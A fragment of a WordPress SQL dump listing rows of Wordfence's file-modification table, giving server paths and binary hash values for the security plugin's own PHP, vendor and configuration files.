('\Zþ½–L6Nå1×;8œ', 'wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'þÊÄç¿gÁÇ]ˆ>pú', '¾•‘u3}(%&TfÉ_©"dKi6èFÿx“phlù', '', 0, '?'),
('ˆ»Çg“•Ý[zë´\0Î®›', 'wp-content/plugins/wordfence/modules/login-security/views/page/settings.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/page/settings.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '…Ý¤)e¤à&´vW4À', ']Zªî*WÒ!Oe‹HÒv8ÍalùÉû|ú\rÉ30–•õ', '', 0, '?'),
('T¦Òñ\röfV„+Üø j›', 'wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'gxX€£JTÑïŠbxÊú', 'f˜x¤/Òxè¨Àë°GÜ\n8‡5ú6‰	Zô+', '', 0, '?'),
('‹ÒË©6ýf/Ú6YjI\0îW', 'wp-content/plugins/wordfence/modules/login-security/views/settings/options.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/settings/options.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'føÀÝq¥+Óûfwé\0æþ', 'Ì¦bFñ×®C~ÅuŸ;mê´ÿ}èPaM2å,0S,¨', '', 0, '?'),
('¤Ygáù$zÉHá.Yéá', 'wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'åššO¤×….(\râ"ð\Z\0Z', 'Î‚:¯ñÖÇ²=k:E7Ì[eªÒV%ÇbÅ3rƒÞ\Z‡°', '', 0, '?'),
('µ¥äªyx“èâÂx4*ý ', 'wp-content/plugins/wordfence/modules/login-security/views/user/grace-period-toggle.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/user/grace-period-toggle.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'j7 7=õŽ‰`â8Î', '¨zýÐt÷Œ§ëX¹ŠÎÑ¦xußúV\0', '', 0, '?'),
('d•kòû‘JQAw6im<B1', 'wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'òq\Zõ–Âç}Û*ŒYÄ', 'ûö-¿gsñ{ª)!ÌëÏÀÐM@ª¸;ð•Àä-DN‘', '', 0, '?');
INSERT INTO `wpou_wffilemods` VALUES
('¿vé—FI—Ë2h´Ïø¤nÁ', 'wp-content/plugins/wordfence/readme.txt', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/readme.txt', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '?n…©!‘0IN	+£Ü»Ý', '™1/L]I¡»7xô„³Íµßï''y¼Ìœ[ûÂÍ‰n~', '', 0, '?'),
('ï;Lát‰×¬C°ƒ”É£', 'wp-content/plugins/wordfence/tmp/.htaccess', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/tmp/.htaccess', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '·I z~Òi¶,Lžÿè', '	ù¦HQIéqz¼Ú¤øpÆ9ŸC4>Hü€Â3¨‰„G', '', 0, '?'),
('áá"ÐC*ÿª×šÝ.®±', 'wp-content/plugins/wordfence/vendor/.htaccess', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/.htaccess', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '£E"xKÊê{Ç8ödS³', 'C‡¾ö½''r…9½ì@âK¡Þ†t¡ª™öâ§w#@kº', '', 0, '?'),
('=S–6Èa°ŸXo°,”2', 'wp-content/plugins/wordfence/vendor/autoload.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/autoload.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Œ7àÂln_pBH5…!5=(', '3ð¯-g,ÓŒ=$Í¡gÜÀ7Óªâ:V10˜Šh´Æ', '', 0, '?'),
('_£k4é÷·!*}ˆ‚Ý„ ', 'wp-content/plugins/wordfence/vendor/composer/ClassLoader.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/composer/ClassLoader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ì "UE"´Eb;Dånð', '‹©Ô±ë»r–gÜêCXJUË1ø’Ö‰Ya,Ùð1', '', 0, '?'),
('q½öEŸ‡vº…{—Zšâ[', 'wp-content/plugins/wordfence/vendor/composer/InstalledVersions.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/composer/InstalledVersions.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'q~±f‘¦œ¥ïŒÍîë“"á', 'p,Õ-ÚgW¿‡ÔŽõ¼W‚Ò.cýE‚¢²âM', '', 0, '?'),
('¢0áÁ&¥Y©îÕ ÕÁ¡', 'wp-content/plugins/wordfence/vendor/composer/LICENSE', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/composer/LICENSE', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '•]_åŒ#Dö´\0óƒµâ', '\Z ŸøÛ’ö%§4~NÙ~Gh!bØ­:w‚˜ÉŒ¿™''', '', 0, '?'),
('"0ÂrN1M•áä#ž áÀ', 'wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '°šyÅtPº>Ra­Sô@-', 'u{4ó¹·s…ñÁJ‰ˆ÷Ì3÷H¨×6owËr', '', 0, '?'),
('t‰Ž®‘Äô!æ\Z‡%\n', 'wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '5á,}vÄ¨3¼õGÀâ)©', 'E½r4@\0¸Ô¡$¦âzæú3ð¸$l²ê\ZÐ`iäexÃlÊ', '', 0, '?'),
('sìÃË±ŒY*u¿©áO„', 'wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '’ñ^Ë€JÎ—rhZ/Na$', 'À§ä	:€ÜH’×0vˆ=ÒTÑ$bëÔ†ñ^sÅ\\71Í', '', 0, '?'),
('~ÅÓ¸bcöÝ\Z$@$©ò*', 'wp-content/plugins/wordfence/vendor/composer/autoload_real.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/composer/autoload_real.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '­8–Àb;”=YXJ)Õ·', 'ª‰¸Ì†%\rèÕ–Nìn_nÚ''E¿Ý¸Ú–®W{=D', '', 0, '?'),
('õ!¥Ö(yJo*ÈîJØ', 'wp-content/plugins/wordfence/vendor/composer/autoload_static.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/composer/autoload_static.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Þ6‡Ù	P—W™n"çµÐb', '”áEgpúÔ¨whÎ’.”°§§3Á\në¦fÍNÜ', '', 0, '?'),
('Ð¬]mÙ²§	â–­ì', 'wp-content/plugins/wordfence/vendor/composer/installed.json', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/composer/installed.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Mã£X"‘ Æ·»U‚]\\', '*¤5–Å“­á,žôVu‚C*‚_ïõôo1\nPCœ\rF', '', 0, '?'),
('Èxö¼xj´«^×€ºƒÕ', 'wp-content/plugins/wordfence/vendor/composer/installed.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/composer/installed.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '³$SNŽRcg..3ê', 'Ó}[³VDç—ŽŠx¡cÈõ0²Ö÷´{Ò''x Ùv¡²ú', '', 0, '?'),
('Æ‰ä‰à©3Sº+c¸,N5', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/ControlByte.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/ControlByte.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Úð=û­öxë$ü´/"', ' ÝHE¬*ø˜ ÛdÇ­±ÉülÙÆ)•­ØzÌ8Ó¶', '', 0, '?'),
('dWËÓçË9Ys¼[¼', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/DataFieldParser.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/DataFieldParser.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ñì<¨EFçC«\0ëì8,', 'kçtvš¿ª+Ñ#–ÿáˆ?G¹^-é–ªR¥-Yè\rÃy', '', 0, '?'),
('±\r5 -|ÔÁËƒÌI\Z', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Database.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Database.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'É˜:Ü?ì¢‘®.''\0CÂ', 'Y9½Æ£ù©ÏÈåƒY®ªl-[	Ã\Z®‹€²/', '', 0, '?'),
('Ý5 <Ø]Ôšéùæ>Ëu¶', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/DatabaseMetadata.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/DatabaseMetadata.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '³I}ÛbäÆ~ LMQØ', 'WVŠXH‡¥ÉWŸ¯r’ rt(¡èà<b¾)', '', 0, '?'),
('(ñÄÜù''iºý^ŒöŠc¬', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Endianness.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Endianness.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'piúî‚R"o¸-/\r', '³Ô$s“E''m&h²†åëÿ é}[&–žþŽ;X÷Ð', '', 0, '?'),
('Ló¿b‡>­oO¿jùñ*6', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/FormatException.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/FormatException.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'EosÚCg.hÅ#É;a`úô', '\r¦ëžÓƒÈEQÅ¹ºi©°Ìoü?,ÔœUPá>kû4—®Ø', '', 0, '?'),
('VÃ„ÌnÍ²ð$•êmqþh', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IncompatibleIpVersionException.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IncompatibleIpVersionException.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ï·N=|òÐ£wu¹ å“ì', '¬á$,oo™ÆÛÖ]Ò‡fY{B\\\0Q˜ï_Ñn', '', 0, '?'),
(',+E&*tÓhÄgÓN', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IncompatibleVersionException.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IncompatibleVersionException.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '„|¾7.¤ôQžå\råV', '''/.×®\rf=ÏÐŸ&Å‡Ü¿5j‡!{\0WÑQPå', '', 0, '?'),
('GÌI2Bx˜f!''è‚', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidArgumentException.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidArgumentException.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'kç‘¿reü›¦ÂUBÔ]÷', ' ¦yI˜pQ”Ø)Ç<5³O‚Êo•Ž-9æÞjWSz[,', '', 0, '?'),
('ˆ~äc«³ìÏ*cá{i', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidIpAddressException.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidIpAddressException.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '9 ¶	TD$FgiEnƒ', '¨–ž óßS]§S†(nÁ³äZ\0çÊ²¸§', '', 0, '?'),
('â®˜¥Ÿ ¬F„þ„wè\0', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidOperationException.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidOperationException.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'kEmi‚[ÂÃÑîtR°½¯a', 'Xóýj/+M@ÞDpeÏ«Å¯/-pQ0VÉ‚', '', 0, '?'),
('ò¬ø\ZÐl‹«„š÷8/¤~', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IoException.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IoException.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'êæsÓ”ûõ"¤K u©#', '|‹œ*~Ör™Çªò ¸„b©ÞyD“RŸÃ£ŠAxÌ', '', 0, '?'),
('û\nN™L¼¿<ffJi+$iC', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/MmdbException.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/MmdbException.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'œl•2ðÌ¢=ýà†|\n^‡', '\ree:Î¨<–iÚáÍß’Î#‡—4Øƒë)"Vƒ½§á', '', 0, '?'),
('ôS ],4Fr8Ñv', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/MmdbThrowable.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/MmdbThrowable.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'fð-\\±é;µ±õXßë‹=', '\Z«78Ue)Ö1ç¨/´<ÜjÙ''é˜ù&Õ‘ç+(', '', 0, '?'),
('Ýofï™ðä¨Aÿî×(', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/RuntimeMmdbException.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/RuntimeMmdbException.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'nJ!^\r„Y^Ë&é©[cáþ', 'Î$—ök†[‚o®B÷LZ@hÌaWÂ†TòÌe‘Ç', '', 0, '?'),
('þÛÏC¼	èëÞ}(ŸµÑd', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IntegerParser.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IntegerParser.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '’…ôûO¯u¼×‡]`+{', '®ÿTçÖwAkÚÍPÛ¨F''Ü6œV~öšwsóp”Ê', '', 0, '?'),
('NÜ9ø„6˜6”Ÿ•â^˜', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Io/FileHandle.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Io/FileHandle.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'èôòû˜)j¡G@-{´bk!', 'Ñ€’aƒúØúÐjfV,®µH—?ýø\\£÷tÙFÕô', '', 0, '?'),
('Xi83Žåqb|õƒ,\r', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IpAddress.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IpAddress.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '“f!ÉŽ”Ð“ç»Â°ó‹', 'FÀv¿^Z³›SuØžáÅ¥ðpß\n“²Ck', '', 0, '?'),
('v1„´,->d.¡ŽãÊ#“', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IpAddressInterface.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IpAddressInterface.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¹y[ÜÇ¡h¦b¶ø£', '2b¿VÇCÎ–z°ÒÄžÐÈMOp©¼¨2¸6Ý¢´×³', '', 0, '?'),
('îpq—K Ägƒ­‘¶4k', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Node.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Node.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'vøK›úý<•ÛtÝ× ÂQ', 'ôO[^á‰Á°yV¦`Ëâêž=éhè+ï°°dÑ\0-', '', 0, '?'),
('ÕåuORŸOÌªks93ª¤ ', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/NodeReader.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/NodeReader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¶0Ù_MW{¶ÞýÛ\rù', '<#{ÝcÆmÏ|Îû^ðI}í6èyiÛß™Õ„Ž U\0', '', 0, '?'),
('ò†?=äƒ„b¹¸·ô^ð', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/NodeRecord.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/NodeRecord.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '²š~ü$õxM6filK@Ã', '­™¼†JË]Õ''œø\ZuÑ(XñÝ´R"', '', 0, '?'),
('~i°IÒ;Ý­]œA»ÈS', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'GPE»KT»ÞíY–)&F–£', 'þ™ó¥_¯0dœŠþ}f!†vÙm§ÍEwW„o—', '', 0, '?'),
('I6U‰\r7´ÓúŠÖ3pí¸', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ž‚h<ªé¶|Û7bš©¸', 'ÕÙ_ú^F"ýæ;+r&Z~Ó¦QÐêð¨Íø|ã±ø5¥', '', 0, '?'),
('„ÖnvûŸZùYVßûÉþ', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'nÿ6GÚ6)øç(Pè÷', 'CX·×E¨aø/fPK{ÕË¾éé^jÞ"C3FeƒÖ´S', '', 0, '?'),
('‹ìåëãÁ±cˆ<[‘Š', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/api.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/api.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ž¥7Ž×§E0ùI²qX', 'mOÉâ©±XïXƒ\0Eí,Z*ßÔy*Ùz7;š', '', 0, '?'),
('BJ’„O¢žä¯ü†zD±', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÍÈ{ö1¬MRœKE_ßú/', '|qŸUUÑ¿ÃŽ|z¹G>*“Ûœ"‰éæI¢þÝ;ƒ', '', 0, '?'),
('ì¶Pdºµ“ý’íc3', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÒÅ.<$Eÿ\0—þg½:T±', 'ÆER%ùó–fÆ\\ŸÉ¾ä\rv”8Cÿ^Âh', '', 0, '?'),
('ù“,ü¦¡`Ïùt÷àtÜb7', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/i18n.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/i18n.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '€MPØ<^fë§GñžÔ C', 'V“$oBÞžjÅÈf0‘Ö«‚QxËuøTÄ=a¨Æ`í ’K', '', 0, '?'),
('ù^Q6l„ÏJ! 	âÍ¦', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÜÉ\\›æoNä.’Ž', '>4ßi3®|Œ‹v1µNé¦ò6‡wD¨)Müäjr', '', 0, '?'),
('ß¹VÌ=¿£»"à#n§	¹', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '_à-…T³\0Ê2²L-Õ', '¢È´¾÷£àg’Aã]Óz-Û£²ð¢ûüá·¸[Ï', '', 0, '?'),
('à–ÊrªÖMÓÜ´-\nSƒ„', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'eRèÛrú#ˆUÿý½çŠ', 'èÐ”sÈGd‘“lãIB-?`7|rÚRÞÝ3µƒ¬V', '', 0, '?'),
('ŠÈàý×X/÷Û\0þƒ	', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ø‘¸ÔiJ‚B!<\0', 'VºÇ4“^CÃD\Z‘îÜÃïü’óÍÎ;ÁùU‚z', '', 0, '?'),
('nóÊó09j®v8õ"', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'EfÈ€Í!77#2A', 'ŠQ…ÉÚOÌ|R)VqøC¹Wª‘ô(‡É@ß‚@+õ“', '', 0, '?'),
('Ò­ó_VlKøg°!p†1', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'JÁ3Xã#ˆ[ÿúÏŠPq', 'f‰ó1`ÿ©H7«)dy÷>„¥äO\\ê­.Ãƒm[Ä', '', 0, '?'),
('±£®±&9Õâ—-ZŽØ', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/shutdown.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/shutdown.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '’ü0E9ìc=''	\0æŠè ', 'x–¿ˆÙµ;ŠP¬i|ž:×ïÈâ\rúÿ\riHÃ¤•¾a', '', 0, '?'),
('!ñOŠ4ÖbCRR›fO²', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'd\nr„’COß¶²æÞaÂí', '¨2’tÐÝÓ‘ æ@f†˜j›xmÿ>‰Ó*žÀ4êá', '', 0, '?'),
('IWï“9Ùa€ÖWœ±3(', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ßHvÔ~…Q=³zØ8j''', 'én¿{(-šŠB?¨œ<m}î³ç™ú²Û¸sã–ÃÇp–', '', 0, '?'),
('cþ†[b]ËÀþÝ½‡JF', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '§I]˜UÀæ	XÀgƒ¬‹¾', 'þTÂÏš-Ã1 [ëž@./ió’¶¦”iÈÅqÙë0˜o', '', 0, '?'),
('ØÐ¡qDÖš?ÓižX', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¦õM˜yšWµ¬Øù«n', 'D³¼‚Z_1dÈr‡‘FyÌ‚·æ–ŽbÜ	C*Ã‘ ð', '', 0, '?'),
('å''Ò`FÌ”Ì~ÙÄ–“œ', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'C¿ýõØéÌ0Ð+C„²…', '`>&i(Å¹›…‚C”Îßfÿîë&ñÏì>Y"¦', '', 0, '?'),
('ž…¶»½î¢è†<ïxÍBŒ', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'h,3x¾vÉÙµMê ý', 'm°½Þ4Ä€£r!Võ^¥K ª(¦¦ùMí¹þ]±', '', 0, '?'),
('\ní@©g‘Ý+T;V¶–', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/xmlrpc.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/xmlrpc.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ãÕf—­Â\r@)ø«ë»š', '¼;—•¿Ì_IøÝmò1›Ž£øµ\nî9|!Þ¶å¯', '', 0, '?'),
